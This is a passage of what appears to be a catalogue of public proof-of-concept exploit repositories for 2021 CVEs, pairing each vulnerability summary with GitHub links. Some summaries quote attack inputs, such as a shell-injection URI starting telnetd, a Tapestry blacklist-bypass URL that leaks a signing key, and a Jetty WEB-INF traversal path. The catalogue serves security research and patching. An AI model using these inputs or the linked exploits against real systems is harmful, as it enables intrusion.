- [sirpedrotavares/Proxylogon-exploit](https://github.com/sirpedrotavares/Proxylogon-exploit)
### CVE-2021-26868 (2021-03-11)
Windows Graphics Component Elevation of Privilege Vulnerability
- [KangD1W2/CVE-2021-26868](https://github.com/KangD1W2/CVE-2021-26868)
### CVE-2021-26871 (2021-03-11)
Windows WalletService Elevation of Privilege Vulnerability
- [fr4nkxixi/CVE-2021-26871_POC](https://github.com/fr4nkxixi/CVE-2021-26871_POC)
### CVE-2021-26882 (2021-03-11)
Remote Access API Elevation of Privilege Vulnerability
- [taiji-xo/CVE-2021-26882](https://github.com/taiji-xo/CVE-2021-26882)
### CVE-2021-26903 (2021-02-26)
LMA ISIDA Retriever 5.2 is vulnerable to XSS via query['text'].
- [Security-AVS/CVE-2021-26903](https://github.com/Security-AVS/CVE-2021-26903)
### CVE-2021-26904 (2021-02-26)
LMA ISIDA Retriever 5.2 allows SQL Injection.
- [Security-AVS/-CVE-2021-26904](https://github.com/Security-AVS/-CVE-2021-26904)
### CVE-2021-26943 (2021-03-31)
The UX360CA BIOS through 303 on ASUS laptops allow an attacker (with the ring 0 privilege) to overwrite nearly arbitrary physical memory locations, including SMRAM, and execute arbitrary code in the SMM (issue 3 of 3).
- [tandasat/SmmExploit](https://github.com/tandasat/SmmExploit)
### CVE-2021-27065 (2021-03-02)
Microsoft Exchange Server Remote Code Execution Vulnerability
- [adamrpostjr/cve-2021-27065](https://github.com/adamrpostjr/cve-2021-27065)
### CVE-2021-27180 (2021-04-14)
An issue was discovered in MDaemon before 20.0.4. There is Reflected XSS in Webmail (aka WorldClient). It can be exploited via a GET request. It allows performing any action with the privileges of the attacked user.
- [chudyPB/MDaemon-Advisories](https://github.com/chudyPB/MDaemon-Advisories)
### CVE-2021-27187 (2021-02-12)
The Sovremennye Delovye Tekhnologii FX Aggregator terminal client 1 stores authentication credentials in cleartext in login.sav when the Save Password box is checked.
- [jet-pentest/CVE-2021-27187](https://github.com/jet-pentest/CVE-2021-27187)
### CVE-2021-27188 (2021-02-12)
The Sovremennye Delovye Tekhnologii FX Aggregator terminal client 1 allows attackers to cause a denial of service (access suspended for five hours) by making five invalid login attempts to a victim's account.
- [jet-pentest/CVE-2021-27188](https://github.com/jet-pentest/CVE-2021-27188)
### CVE-2021-27190 (2021-02-12)
A Stored Cross Site Scripting(XSS) Vulnerability was discovered in PEEL SHOPPING 9.3.0 and 9.4.0, which are publicly available. The user supplied input containing polyglot payload is echoed back in javascript code in HTML response. This allows an attacker to input malicious JavaScript which can steal cookie, redirect them to other malicious website, etc.
- [anmolksachan/CVE-2021-27190-PEEL-Shopping-cart-9.3.0-Stored-XSS](https://github.com/anmolksachan/CVE-2021-27190-PEEL-Shopping-cart-9.3.0-Stored-XSS)
### CVE-2021-27198 (2021-02-26)
An issue was discovered in Visualware MyConnection Server before v11.1a. Unauthenticated Remote Code Execution can occur via Arbitrary File Upload in the web service when using a myspeed/sf?filename= URI. This application is written in Java and is thus cross-platform. The Windows installation runs as SYSTEM, which means that exploitation gives one Administrator privileges on the target system.
- [rwincey/CVE-2021-27198](https://github.com/rwincey/CVE-2021-27198)
### CVE-2021-27211 (2021-02-15)
steghide 0.5.1 relies on a certain 32-bit seed value, which makes it easier for attackers to detect hidden data.
- [b4shfire/stegcrack](https://github.com/b4shfire/stegcrack)
### CVE-2021-27246 (2021-04-14)
This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of TP-Link Archer A7 AC1750 1.0.15 routers. Authentication is not required to exploit this vulnerability. The specific flaw exists within the handling of MAC addresses by the tdpServer endpoint. A crafted TCP message can write stack pointers to the stack. An attacker can leverage this vulnerability to execute code in the context of the root user. Was ZDI-CAN-12306.
- [synacktiv/CVE-2021-27246_Pwn2Own2020](https://github.com/synacktiv/CVE-2021-27246_Pwn2Own2020)
### CVE-2021-27328 (2021-02-19)
Yeastar NeoGate TG400 91.3.0.3 devices are affected by Directory Traversal. An authenticated user can decrypt firmware and can read sensitive information, such as a password or decryption key.
- [SQSamir/CVE-2021-27328](https://github.com/SQSamir/CVE-2021-27328)
### CVE-2021-27338 (2021-07-20)
Faraday Edge before 3.7 allows XSS via the network/create/ page and its network name parameter.
- [Pho03niX/CVE-2021-27338](https://github.com/Pho03niX/CVE-2021-27338)
### CVE-2021-27342 (2021-05-17)
An authentication brute-force protection mechanism bypass in telnetd in D-Link Router model DIR-842 firmware version 3.0.2 allows a remote attacker to circumvent the anti-brute-force cool-down delay period via a timing-based side-channel attack
- [mavlevin/D-Link-CVE-2021-27342-exploit](https://github.com/mavlevin/D-Link-CVE-2021-27342-exploit)
### CVE-2021-27403 (2021-02-19)
Askey RTF8115VW BR_SV_g11.11_RTF_TEF001_V6.54_V014 devices allow cgi-bin/te_acceso_router.cgi curWebPage XSS.
- [bokanrb/CVE-2021-27403](https://github.com/bokanrb/CVE-2021-27403)
### CVE-2021-27404 (2021-02-19)
Askey RTF8115VW BR_SV_g11.11_RTF_TEF001_V6.54_V014 devices allow injection of a Host HTTP header.
- [bokanrb/CVE-2021-27404](https://github.com/bokanrb/CVE-2021-27404)
### CVE-2021-27513 (2021-02-21)
The module admin_ITSM in EyesOfNetwork 5.3-10 allows remote authenticated users to upload arbitrary .xml.php files because it relies on "le filtre userside."
- [ArianeBlow/CVE-2021-27513-CVE-2021-27514](https://github.com/ArianeBlow/CVE-2021-27513-CVE-2021-27514)
- [ArianeBlow/CVE-2021-27513](https://github.com/ArianeBlow/CVE-2021-27513)
### CVE-2021-27651 (2021-04-29)
In versions 8.2.1 through 8.5.2 of Pega Infinity, the password reset functionality for local accounts can be used to bypass local authentication checks.
- [samwcyo/CVE-2021-27651-PoC](https://github.com/samwcyo/CVE-2021-27651-PoC)
- [Vulnmachines/CVE-2021-27651](https://github.com/Vulnmachines/CVE-2021-27651)
- [orangmuda/CVE-2021-27651](https://github.com/orangmuda/CVE-2021-27651)
### CVE-2021-27850 (2021-04-15)
A critical unauthenticated remote code execution vulnerability was found all recent versions of Apache Tapestry. The affected versions include 5.4.5, 5.5.0, 5.6.2 and 5.7.0. The vulnerability I have found is a bypass of the fix for CVE-2019-0195. Recap: Before the fix of CVE-2019-0195 it was possible to download arbitrary class files from the classpath by providing a crafted asset file URL. An attacker was able to download the file `AppModule.class` by requesting the URL `http://localhost:8080/assets/something/services/AppModule.class` which contains a HMAC secret key. The fix for that bug was a blacklist filter that checks if the URL ends with `.class`, `.properties` or `.xml`. Bypass: Unfortunately, the blacklist solution can simply be bypassed by appending a `/` at the end of the URL: `http://localhost:8080/assets/something/services/AppModule.class/` The slash is stripped after the blacklist check and the file `AppModule.class` is loaded into the response. This class usually contains the HMAC secret key which is used to sign serialized Java objects. With the knowledge of that key an attacker can sign a Java gadget chain that leads to RCE (e.g. CommonsBeanUtils1 from ysoserial). Solution for this vulnerability: * For Apache Tapestry 5.4.0 to 5.6.1, upgrade to 5.6.2 or later. * For Apache Tapestry 5.7.0, upgrade to 5.7.1 or later.
- [kahla-sec/CVE-2021-27850_POC](https://github.com/kahla-sec/CVE-2021-27850_POC)
- [dorkerdevil/CVE-2021-27850_POC](https://github.com/dorkerdevil/CVE-2021-27850_POC)
- [Ovi3/CVE_2021_27850_POC](https://github.com/Ovi3/CVE_2021_27850_POC)
- [novysodope/CVE-2021-27850](https://github.com/novysodope/CVE-2021-27850)
### CVE-2021-27890 (2021-03-15)
SQL Injection vulnerablity in MyBB before 1.8.26 via theme properties included in theme XML files.
- [xiaopan233/Mybb-XSS_SQL_RCE-POC](https://github.com/xiaopan233/Mybb-XSS_SQL_RCE-POC)
### CVE-2021-27905 (2021-04-13)
The ReplicationHandler (normally registered at "/replication" under a Solr core) in Apache Solr has a "masterUrl" (also "leaderUrl" alias) parameter that is used to designate another ReplicationHandler on another Solr core to replicate index data into the local core. To prevent a SSRF vulnerability, Solr ought to check these parameters against a similar configuration it uses for the "shards" parameter. Prior to this bug getting fixed, it did not. This problem affects essentially all Solr versions prior to it getting fixed in 8.8.2.
- [Henry4E36/Solr-SSRF](https://github.com/Henry4E36/Solr-SSRF)
- [W2Ning/Solr-SSRF](https://github.com/W2Ning/Solr-SSRF)
- [murataydemir/CVE-2021-27905](https://github.com/murataydemir/CVE-2021-27905)
- [pdelteil/CVE-2021-27905.POC](https://github.com/pdelteil/CVE-2021-27905.POC)
### CVE-2021-27928 (2021-03-19)
A remote code execution issue was discovered in MariaDB 10.2 before 10.2.37, 10.3 before 10.3.28, 10.4 before 10.4.18, and 10.5 before 10.5.9; Percona Server through 2021-03-03; and the wsrep patch through 2021-03-03 for MySQL. An untrusted search path leads to eval injection, in which a database SUPER user can execute OS commands after modifying wsrep_provider and wsrep_notify_cmd. NOTE: this does not affect an Oracle product.
- [Al1ex/CVE-2021-27928](https://github.com/Al1ex/CVE-2021-27928)
- [shamo0/CVE-2021-27928-POC](https://github.com/shamo0/CVE-2021-27928-POC)
- [LalieA/CVE-2021-27928](https://github.com/LalieA/CVE-2021-27928)
### CVE-2021-27963 (2021-03-05)
SonLogger before 6.4.1 is affected by user creation with any user permissions profile (e.g., SuperAdmin). An anonymous user can send a POST request to /User/saveUser without any authentication or session header.
- [erberkan/SonLogger-vulns](https://github.com/erberkan/SonLogger-vulns)
### CVE-2021-27965 (2021-03-05)
The MsIo64.sys driver before 1.1.19.1016 in MSI Dragon Center before 2.0.98.0 has a buffer overflow that allows privilege escalation via a crafted 0x80102040, 0x80102044, 0x80102050, or 0x80102054 IOCTL request.
- [mathisvickie/CVE-2021-27965](https://github.com/mathisvickie/CVE-2021-27965)
- [Jeromeyoung/CVE-2021-27965](https://github.com/Jeromeyoung/CVE-2021-27965)
- [fengjixuchui/CVE-2021-27965](https://github.com/fengjixuchui/CVE-2021-27965)
### CVE-2021-28079 (2021-04-26)
Jamovi <=1.6.18 is affected by a cross-site scripting (XSS) vulnerability. The column-name is vulnerable to XSS in the ElectronJS Framework. An attacker can make a .omv (Jamovi) document containing a payload. When opened by victim, the payload is triggered.
- [g33xter/CVE-2021-28079](https://github.com/g33xter/CVE-2021-28079)
### CVE-2021-28164 (2021-04-01)
In Eclipse Jetty 9.4.37.v20210219 to 9.4.38.v20210224, the default compliance mode allows requests with URIs that contain %2e or %2e%2e segments to access protected resources within the WEB-INF directory. For example a request to /context/%2e/WEB-INF/web.xml can retrieve the web.xml file. This can reveal sensitive information regarding the implementation of a web application.
- [jammy0903/-jettyCVE-2021-28164-](https://github.com/jammy0903/-jettyCVE-2021-28164-)
### CVE-2021-28165 (2021-04-01)
In Eclipse Jetty 7.2.2 to 9.4.38, 10.0.0.alpha0 to 10.0.1, and 11.0.0.alpha0 to 11.0.1, CPU usage can reach 100% upon receiving a large invalid TLS frame.
- [uthrasri/CVE-2021-28165](https://github.com/uthrasri/CVE-2021-28165)
- [hshivhare67/Jetty_v9.4.31_CVE-2021-28165](https://github.com/hshivhare67/Jetty_v9.4.31_CVE-2021-28165)
### CVE-2021-28310 (2021-04-13)
Win32k Elevation of Privilege Vulnerability
- [Rafael-Svechinskaya/IOC_for_CVE-2021-28310](https://github.com/Rafael-Svechinskaya/IOC_for_CVE-2021-28310)
### CVE-2021-28312 (2021-04-13)
Windows NTFS Denial of Service Vulnerability
- [shubham0d/CVE-2021-28312](https://github.com/shubham0d/CVE-2021-28312)
### CVE-2021-28378 (2021-03-15)
Gitea 1.12.x and 1.13.x before 1.13.4 allows XSS via certain issue data in some situations.
- [pandatix/CVE-2021-28378](https://github.com/pandatix/CVE-2021-28378)
### CVE-2021-28476 (2021-05-11)
Windows Hyper-V Remote Code Execution Vulnerability
- [0vercl0k/CVE-2021-28476](https://github.com/0vercl0k/CVE-2021-28476)
- [bluefrostsecurity/CVE-2021-28476](https://github.com/bluefrostsecurity/CVE-2021-28476)
- [LaCeeKa/CVE-2021-28476-tools-env](https://github.com/LaCeeKa/CVE-2021-28476-tools-env)
- [australeo/CVE-2021-28476](https://github.com/australeo/CVE-2021-28476)
- [2273852279qqs/0vercl0k](https://github.com/2273852279qqs/0vercl0k)
- [dengyang123x/0vercl0k](https://github.com/dengyang123x/0vercl0k)
### CVE-2021-28480 (2021-04-13)
Microsoft Exchange Server Remote Code Execution Vulnerability
- [ZephrFish/CVE-2021-28480_HoneyPoC3](https://github.com/ZephrFish/CVE-2021-28480_HoneyPoC3)
- [Threonic/CVE-2021-28480](https://github.com/Threonic/CVE-2021-28480)
### CVE-2021-28482 (2021-04-13)
Microsoft Exchange Server Remote Code Execution Vulnerability
- [Shadow0ps/CVE-2021-28482-Exchange-POC](https://github.com/Shadow0ps/CVE-2021-28482-Exchange-POC)
- [KevinWorst/CVE-2021-28482_Exploit](https://github.com/KevinWorst/CVE-2021-28482_Exploit)
### CVE-2021-28663 (2021-05-10)
The Arm Mali GPU kernel driver allows privilege escalation or information disclosure because GPU memory operations are mishandled, leading to a use-after-free. This affects Bifrost r0p0 through r28p0 before r29p0, Valhall r19p0 through r28p0 before r29p0, and Midgard r4p0 through r30p0.
- [lntrx/CVE-2021-28663](https://github.com/lntrx/CVE-2021-28663)
### CVE-2021-29002 (2021-03-24)
A stored cross-site scripting (XSS) vulnerability in Plone CMS 5.2.3 exists in site-controlpanel via the "form.widgets.site_title" parameter.
- [miguelc49/CVE-2021-29002-1](https://github.com/miguelc49/CVE-2021-29002-1)
### CVE-2021-29003 (2021-04-13)
Genexis PLATINUM 4410 2.1 P4410-V2-1.28 devices allow remote attackers to execute arbitrary code via shell metacharacters to sys_config_valid.xgi, as demonstrated by the sys_config_valid.xgi?exeshell=%60telnetd%20%26%60 URI.
- [jaysharma786/CVE-2021-29003](https://github.com/jaysharma786/CVE-2021-29003)
### CVE-2021-29155 (2021-04-20)
An issue was discovered in the Linux kernel through 5.11.x. kernel/bpf/verifier.c performs undesirable out-of-bounds speculation on pointer arithmetic, leading to side-channel attacks that defeat Spectre mitigations and obtain sensitive information from kernel memory. Specifically, for sequences of pointer arithmetic operations, the pointer modification performed by the first operation is not correctly accounted for when restricting subsequent operations.
- [benschlueter/CVE-2021-29155](https://github.com/benschlueter/CVE-2021-29155)
### CVE-2021-29156 (2021-03-25)
ForgeRock OpenAM before 13.5.1 allows LDAP injection via the Webfinger protocol. For example, an unauthenticated attacker can perform character-by-character retrieval of password hashes, or retrieve a session token or a private key.
- [guidepointsecurity/CVE-2021-29156](https://github.com/guidepointsecurity/CVE-2021-29156)
- [5amu/CVE-2021-29156](https://github.com/5amu/CVE-2021-29156)
### CVE-2021-29200 (2021-04-27)
Apache OFBiz has unsafe deserialization prior to 17.12.07 version An unauthenticated user can perform an RCE attack
- [freeide/CVE-2021-29200](https://github.com/freeide/CVE-2021-29200)
### CVE-2021-29267 (2021-03-29)
Sherlock SherlockIM through 2021-03-29 allows Cross Site Scripting (XSS) by leveraging the api/Files/Attachment URI to attack help-desk staff via the chatbot feature.
- [Security-AVS/CVE-2021-29267](https://github.com/Security-AVS/CVE-2021-29267)
### CVE-2021-29337 (2021-06-21)
MODAPI.sys in MSI Dragon Center 2.0.104.0 allows low-privileged users to access kernel memory and potentially escalate privileges via a crafted IOCTL 0x9c406104 call. This IOCTL provides the MmMapIoSpace feature for mapping physical memory.
- [rjt-gupta/CVE-2021-29337](https://github.com/rjt-gupta/CVE-2021-29337)
### CVE-2021-29349 (2021-03-31)
Mahara 20.10 is affected by Cross Site Request Forgery (CSRF) that allows a remote attacker to remove inbox-mail on the server. The application fails to validate the CSRF token for a POST request. An attacker can craft a module/multirecipientnotification/inbox.php pieform_delete_all_notifications request, which leads to removing all messages from a mailbox.
- [0xBaz/CVE-2021-29349](https://github.com/0xBaz/CVE-2021-29349)
- [Vulnmachines/CVE-2021-29349](https://github.com/Vulnmachines/CVE-2021-29349)
### CVE-2021-29440 (2021-04-13)
Grav is a file based Web-platform. Twig processing of static pages can be enabled in the front matter by any administrative user allowed to create or edit pages. As the Twig processor runs unsandboxed, this behavior can be used to gain arbitrary code execution and elevate privileges on the instance. The issue was addressed in version 1.7.11.
- [CsEnox/CVE-2021-29440](https://github.com/CsEnox/CVE-2021-29440)
### CVE-2021-29441 (2021-04-27)
Nacos is a platform designed for dynamic service discovery and configuration and service management. In Nacos before version 1.4.1, when configured to use authentication (-Dnacos.core.auth.enabled=true) Nacos uses the AuthFilter servlet filter to enforce authentication. This filter has a backdoor that enables Nacos servers to bypass this filter and therefore skip authentication checks. This mechanism relies on the user-agent HTTP header so it can be easily spoofed. This issue may allow any user to carry out any administrative tasks on the Nacos server.
- [hh-hunter/nacos-cve-2021-29441](https://github.com/hh-hunter/nacos-cve-2021-29441)
- [bysinks/CVE-2021-29441](https://github.com/bysinks/CVE-2021-29441)
### CVE-2021-29442 (2021-04-27)
Nacos is a platform designed for dynamic service discovery and configuration and service management. In Nacos before version 1.4.1, the ConfigOpsController lets the user perform management operations like querying the database or even wiping it out. While the /data/remove endpoint is properly protected with the @Secured annotation, the /derby endpoint is not protected and can be openly accessed by unauthenticated users. These endpoints are only valid when using embedded storage (derby DB) so this issue should not affect those installations using external storage (e.g. mysql)
- [VictorShem/QVD-2024-26473](https://github.com/VictorShem/QVD-2024-26473)
### CVE-2021-29447 (2021-04-15)
Wordpress is an open source CMS. A user with the ability to upload files (like an Author) can exploit an XML parsing issue in the Media Library leading to XXE attacks. This requires WordPress installation to be using PHP 8. Access to internal files is possible in a successful XXE attack. This has been patched in WordPress version 5.7.1, along with the older affected versions via a minor release. We strongly recommend you keep auto-updates enabled.
- [motikan2010/CVE-2021-29447](https://github.com/motikan2010/CVE-2021-29447)
- [Vulnmachines/wordpress_cve-2021-29447](https://github.com/Vulnmachines/wordpress_cve-2021-29447)
- [dnr6419/CVE-2021-29447](https://github.com/dnr6419/CVE-2021-29447)
- [AssassinUKG/CVE-2021-29447](https://github.com/AssassinUKG/CVE-2021-29447)
- [b-abderrahmane/CVE-2021-29447-POC](https://github.com/b-abderrahmane/CVE-2021-29447-POC)
- [elf1337/blind-xxe-controller-CVE-2021-29447](https://github.com/elf1337/blind-xxe-controller-CVE-2021-29447)
- [Val-Resh/CVE-2021-29447-POC](https://github.com/Val-Resh/CVE-2021-29447-POC)
- [M3l0nPan/wordpress-cve-2021-29447](https://github.com/M3l0nPan/wordpress-cve-2021-29447)
- [mega8bit/exploit_cve-2021-29447](https://github.com/mega8bit/exploit_cve-2021-29447)
- [thomas-osgood/CVE-2021-29447](https://github.com/thomas-osgood/CVE-2021-29447)
- [Abdulazizalsewedy/CVE-2021-29447](https://github.com/Abdulazizalsewedy/CVE-2021-29447)
- [G01d3nW01f/CVE-2021-29447](https://github.com/G01d3nW01f/CVE-2021-29447)
- [viardant/CVE-2021-29447](https://github.com/viardant/CVE-2021-29447)
- [0xRar/CVE-2021-29447-PoC](https://github.com/0xRar/CVE-2021-29447-PoC)
- [andyhsu024/CVE-2021-29447](https://github.com/andyhsu024/CVE-2021-29447)
### CVE-2021-29505 (2021-05-28)
XStream is software for serializing Java objects to XML and back again. A vulnerability in XStream versions prior to 1.4.17 may allow a remote attacker has sufficient rights to execute commands of the host only by manipulating the processed input stream. No user who followed the recommendation to setup XStream's security framework with a whitelist limited to the minimal required types is affected. The vulnerability is patched in version 1.4.17.
- [MyBlackManba/CVE-2021-29505](https://github.com/MyBlackManba/CVE-2021-29505)
### CVE-2021-29627 (2021-04-07)
In FreeBSD 13.0-STABLE before n245050, 12.2-STABLE before r369525, 13.0-RC4 before p0, and 12.2-RELEASE before p6, listening socket accept filters implementing the accf_create callback incorrectly freed a process supplied argument string. Additional operations on the socket can lead to a double free or use after free.
- [raymontag/cve-2021-29627](https://github.com/raymontag/cve-2021-29627)
### CVE-2021-30005 (2021-05-11)
In JetBrains PyCharm before 2020.3.4, local code execution was possible because of insufficient checks when getting the project from VCS.
- [atorralba/CVE-2021-30005-POC](https://github.com/atorralba/CVE-2021-30005-POC)
### CVE-2021-30109 (2021-04-05)
Froala Editor 3.2.6 is affected by Cross Site Scripting (XSS). Under certain conditions, a base64 crafted string leads to persistent Cross-site scripting (XSS) vulnerability within the hyperlink creation module.
- [Hackdwerg/CVE-2021-30109](https://github.com/Hackdwerg/CVE-2021-30109)
### CVE-2021-30128 (2021-04-27)
Apache OFBiz has unsafe deserialization prior to 17.12.07 version
- [LioTree/CVE-2021-30128-EXP](https://github.com/LioTree/CVE-2021-30128-EXP)
### CVE-2021-30146 (2021-04-06)
Seafile 7.0.5 (2019) allows Persistent XSS via the "share of library functionality."
- [Security-AVS/CVE-2021-30146](https://github.com/Security-AVS/CVE-2021-30146)
### CVE-2021-30357 (2021-06-08)
SSL Network Extender Client for Linux before build 800008302 reveals part of the contents of the configuration file supplied, which allows partially disclosing files to which the user did not have access.
- [joaovarelas/CVE-2021-30357_CheckPoint_SNX_VPN_PoC](https://github.com/joaovarelas/CVE-2021-30357_CheckPoint_SNX_VPN_PoC)
### CVE-2021-30461 (2021-05-29)
A remote code execution issue was discovered in the web UI of VoIPmonitor before 24.61. When the recheck option is used, the user-supplied SPOOLDIR value (which might contain PHP code) is injected into config/configuration.php.
- [daedalus/CVE-2021-30461](https://github.com/daedalus/CVE-2021-30461)
- [Vulnmachines/CVE-2021-30461](https://github.com/Vulnmachines/CVE-2021-30461)
- [Al1ex/CVE-2021-30461](https://github.com/Al1ex/CVE-2021-30461)
- [puckiestyle/CVE-2021-30461](https://github.com/puckiestyle/CVE-2021-30461)
### CVE-2021-30481 (2021-04-10)
Valve Steam through 2021-04-10, when a Source engine game is installed, allows remote authenticated users to execute arbitrary code because of a buffer overflow that occurs for a Steam invite after one click.
- [floesen/CVE-2021-30481](https://github.com/floesen/CVE-2021-30481)
- [JHVIW/jhviw.github.io](https://github.com/JHVIW/jhviw.github.io)
### CVE-2021-30551 (2021-06-15)
Type confusion in V8 in Google Chrome prior to 91.0.4472.101 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.
- [xmzyshypnc/CVE-2021-30551](https://github.com/xmzyshypnc/CVE-2021-30551)
### CVE-2021-30573 (2021-08-03)
Use after free in GPU in Google Chrome prior to 92.0.4515.107 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.
- [s4e-io/CVE-2021-30573-PoC-Google-Chrome](https://github.com/s4e-io/CVE-2021-30573-PoC-Google-Chrome)
- [orangmuda/CVE-2021-30573](https://github.com/orangmuda/CVE-2021-30573)
- [kh4sh3i/CVE-2021-30573](https://github.com/kh4sh3i/CVE-2021-30573)
### CVE-2021-30632 (2021-10-08)
Out of bounds write in V8 in Google Chrome prior to 93.0.4577.82 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.
- [Phuong39/PoC-CVE-2021-30632](https://github.com/Phuong39/PoC-CVE-2021-30632)
- [CrackerCat/CVE-2021-30632](https://github.com/CrackerCat/CVE-2021-30632)
- [maldev866/ChExp_CVE-2021-30632](https://github.com/maldev866/ChExp_CVE-2021-30632)
- [paulsery/CVE-2021-30632](https://github.com/paulsery/CVE-2021-30632)
### CVE-2021-30641 (2021-06-10)
Apache HTTP Server versions 2.4.39 to 2.4.46 Unexpected matching behavior with 'MergeSlashes OFF'
- [dja2TaqkGEEfA45/CVE-2021-30641](https://github.com/dja2TaqkGEEfA45/CVE-2021-30641)
### CVE-2021-30657 (2021-09-08)
A logic issue was addressed with improved state management. This issue is fixed in macOS Big Sur 11.3, Security Update 2021-002 Catalina. A malicious application may bypass Gatekeeper checks. Apple is aware of a report that this issue may have been actively exploited..
- [shubham0d/CVE-2021-30657](https://github.com/shubham0d/CVE-2021-30657)
### CVE-2021-30682 (2021-09-08)
A logic issue was addressed with improved restrictions. This issue is fixed in tvOS 14.6, iOS 14.6 and iPadOS 14.6, Safari 14.1.1, macOS Big Sur 11.4, watchOS 7.5. A malicious application may be able to leak sensitive user information.
- [threatnix/csp-playground](https://github.com/threatnix/csp-playground)
### CVE-2021-30731 (2021-09-08)
This issue was addressed with improved checks. This issue is fixed in macOS Big Sur 11.4, Security Update 2021-004 Catalina. An unprivileged application may be able to capture USB devices.
- [osy/WebcamViewer](https://github.com/osy/WebcamViewer)
### CVE-2021-30807 (2021-10-19)
A memory corruption issue was addressed with improved memory handling. This issue is fixed in macOS Big Sur 11.5.1, iOS 14.7.1 and iPadOS 14.7.1, watchOS 7.6.1. An application may be able to execute arbitrary code with kernel privileges. Apple is aware of a report that this issue may have been actively exploited.
- [jsherman212/iomfb-exploit](https://github.com/jsherman212/iomfb-exploit)
- [30440r/gex](https://github.com/30440r/gex)
### CVE-2021-30858 (2021-08-24)
A use after free issue was addressed with improved memory management. This issue is fixed in iOS 14.8 and iPadOS 14.8, macOS Big Sur 11.6. Processing maliciously crafted web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited.
- [kmeps4/CVEREV3](https://github.com/kmeps4/CVEREV3)
- [Jeromeyoung/ps4_8.00_vuln_poc](https://github.com/Jeromeyoung/ps4_8.00_vuln_poc)
### CVE-2021-30860 (2021-08-24)
An integer overflow was addressed with improved input validation. This issue is fixed in Security Update 2021-005 Catalina, iOS 14.8 and iPadOS 14.8, macOS Big Sur 11.6, watchOS 7.6.2. Processing a maliciously crafted PDF may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited.
- [Levilutz/CVE-2021-30860](https://github.com/Levilutz/CVE-2021-30860)
- [jeffssh/CVE-2021-30860](https://github.com/jeffssh/CVE-2021-30860)
### CVE-2021-30937 (2021-08-24)
A memory corruption vulnerability was addressed with improved locking. This issue is fixed in macOS Big Sur 11.6.2, tvOS 15.2, macOS Monterey 12.1, Security Update 2021-008 Catalina, iOS 15.2 and iPadOS 15.2, watchOS 8.3. A malicious application may be able to execute arbitrary code with kernel privileges.
- [realrodri/ExploiteameEsta](https://github.com/realrodri/ExploiteameEsta)
### CVE-2021-30955 (2021-08-24)
A race condition was addressed with improved state handling. This issue is fixed in macOS Monterey 12.1, watchOS 8.3, iOS 15.2 and iPadOS 15.2, tvOS 15.2. A malicious application may be able to execute arbitrary code with kernel privileges.
- [timb-machine-mirrors/jakeajames-CVE-2021-30955](https://github.com/timb-machine-mirrors/jakeajames-CVE-2021-30955)
- [nickorlow/CVE-2021-30955-POC](https://github.com/nickorlow/CVE-2021-30955-POC)
- [verygenericname/CVE-2021-30955-POC-IPA](https://github.com/verygenericname/CVE-2021-30955-POC-IPA)
- [b1n4r1b01/desc_race](https://github.com/b1n4r1b01/desc_race)
- [markie-dev/desc_race_A15](https://github.com/markie-dev/desc_race_A15)
- [Dylbin/desc_race](https://github.com/Dylbin/desc_race)
- [GeoSn0w/Pentagram-exploit-tester](https://github.com/GeoSn0w/Pentagram-exploit-tester)
### CVE-2021-30956 (2021-08-24)
A lock screen issue allowed access to contacts on a locked device. This issue was addressed with improved state management. This issue is fixed in iOS 15.2 and iPadOS 15.2. An attacker with physical access to a device may be able to see private contact information.
- [fordsham/CVE-2021-30956](https://github.com/fordsham/CVE-2021-30956)
### CVE-2021-31159 (2021-06-16)
Zoho ManageEngine ServiceDesk Plus MSP before 10519 is vulnerable to a User Enumeration bug due to improper error-message generation in the Forgot Password functionality, aka SDPMSP-15732.
- [ricardojoserf/CVE-2021-31159](https://github.com/ricardojoserf/CVE-2021-31159)
### CVE-2021-31166 (2021-05-11)
HTTP Protocol Stack Remote Code Execution Vulnerability
- [0vercl0k/CVE-2021-31166](https://github.com/0vercl0k/CVE-2021-31166)
- [zha0gongz1/CVE-2021-31166](https://github.com/zha0gongz1/CVE-2021-31166)
- [mvlnetdev/CVE-2021-31166-detection-rules](https://github.com/mvlnetdev/CVE-2021-31166-detection-rules)
- [corelight/CVE-2021-31166](https://github.com/corelight/CVE-2021-31166)
- [zecopro/CVE-2021-31166](https://github.com/zecopro/CVE-2021-31166)
- [bgsilvait/WIn-CVE-2021-31166](https://github.com/bgsilvait/WIn-CVE-2021-31166)
- [y0g3sh-99/CVE-2021-31166-Exploit](https://github.com/y0g3sh-99/CVE-2021-31166-Exploit)
- [ZZ-SOCMAP/CVE-2021-31166](https://github.com/ZZ-SOCMAP/CVE-2021-31166)
- [imikoYa/CVE-2021-31166-exploit](https://github.com/imikoYa/CVE-2021-31166-exploit)
- [mauricelambert/CVE-2021-31166](https://github.com/mauricelambert/CVE-2021-31166)
- [0xmaximus/Home-Demolisher](https://github.com/0xmaximus/Home-Demolisher)
### CVE-2021-31184 (2021-05-11)
Microsoft Windows Infrared Data Association (IrDA) Information Disclosure Vulnerability
- [waleedassar/CVE-2021-31184](https://github.com/waleedassar/CVE-2021-31184)
### CVE-2021-31233 (2023-05-31)
SQL Injection vulnerability found in Fighting Cock Information System v.1.0 allows a remote attacker to obtain sensitive information via the edit_breed.php parameter.
- [gabesolomon/CVE-2021-31233](https://github.com/gabesolomon/CVE-2021-31233)
### CVE-2021-31290
- [qaisarafridi/cve-2021-31290](https://github.com/qaisarafridi/cve-2021-31290)
### CVE-2021-31589 (2022-01-05)
A cross-site scripting (XSS) vulnerability has been reported and confirmed for BeyondTrust Secure Remote Access Base Software version 6.0.1 and older, which allows the injection of unauthenticated, specially-crafted web requests without proper sanitization.
- [karthi-the-hacker/CVE-2021-31589](https://github.com/karthi-the-hacker/CVE-2021-31589)
### CVE-2021-31630 (2021-08-03)
Command Injection in Open PLC Webserver v3 allows remote attackers to execute arbitrary code via the "Hardware Layer Code Box" component on the "/hardware" page of the application.
- [hev0x/CVE-2021-31630-OpenPLC_RCE](https://github.com/hev0x/CVE-2021-31630-OpenPLC_RCE)
- [Hunt3r0x/CVE-2021-31630-HTB](https://github.com/Hunt3r0x/CVE-2021-31630-HTB)
- [thewhiteh4t/cve-2021-31630](https://github.com/thewhiteh4t/cve-2021-31630)
- [behindsecurity/htb-wifinetictwo-exploit](https://github.com/behindsecurity/htb-wifinetictwo-exploit)
